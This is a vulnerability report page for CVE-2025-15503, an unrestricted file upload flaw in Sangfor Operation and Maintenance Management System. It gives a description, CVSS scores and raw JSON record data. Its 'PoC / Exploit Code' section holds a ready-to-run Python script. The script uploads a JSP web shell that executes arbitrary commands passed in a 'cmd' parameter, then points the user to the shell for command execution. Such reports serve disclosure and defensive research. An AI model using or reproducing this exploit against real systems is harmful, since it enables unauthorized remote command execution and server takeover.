Security Vulnerability Report
中文
CVE-2025-15503 CVSS 7.3 HIGH

CVE-2025-15503

Published: 2026-01-10 09:15:50
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in Sangfor Operation and Maintenance Management System up to 3.0.8. The impacted element is an unknown function of the file /fort/trust/version/common/common.jsp. Performing a manipulation of the argument File results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:sangfor:operation_and_maintenance_security_management_system:*:*:*:*:*:*:*:* - VULNERABLE
Sangfor Operation and Maintenance Management System <= 3.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-15503 PoC - Sangfor Operation and Maintenance Management System Unrestricted File Upload # This PoC demonstrates the file upload vulnerability in Sangfor system import requests import sys def exploit(target_url, file_path): """ Exploit the unrestricted file upload vulnerability :param target_url: Target system URL (e.g., http://target.com) :param file_path: Path to the file to upload """ upload_url = f"{target_url}/fort/trust/version/common/common.jsp" # Prepare malicious file content (JSP WebShell example) malicious_content = '''<%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd"); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>''' try: # Send file upload request files = {'File': ('shell.jsp', malicious_content, 'application/octet-stream')} response = requests.post(upload_url, files=files, timeout=10) print(f"[*] Upload request sent to: {upload_url}") print(f"[*] Status code: {response.status_code}") if response.status_code == 200: print("[+] File upload appears successful!") print("[*] Access uploaded file at: /fort/trust/version/common/shell.jsp?cmd=whoami") else: print("[-] Upload may have failed. Check manually.") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} http://vulnerable-server.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit(target, 'shell.jsp')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15503", "sourceIdentifier": "[email protected]", "published": "2026-01-10T09:15:49.850", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Sangfor Operation and Maintenance Management System up to 3.0.8. The impacted element is an unknown function of the file /fort/trust/version/common/common.jsp. Performing a manipulation of the argument File results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en el Sistema de Gestión de Operación y Mantenimiento de Sangfor hasta la versión 3.0.8. El elemento afectado es una función desconocida del archivo /fort/trust/version/common/common.jsp. Realizar una manipulación del argumento File resulta en una carga sin restricciones. El ataque es posible de llevar a cabo remotamente. El exploit ha sido liberado al público y puede ser utilizado para ataques. El proveedor fue contactado con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sangfor:operation_and_maintenance_security_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.0.8", "matchCriteriaId": "C22128FB-E516-45CF-8954-7857D796A200"}]}]}], "references": [{"url": "https://github.com/master-abc/cve/issues/13", "source": "[email protected]", ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.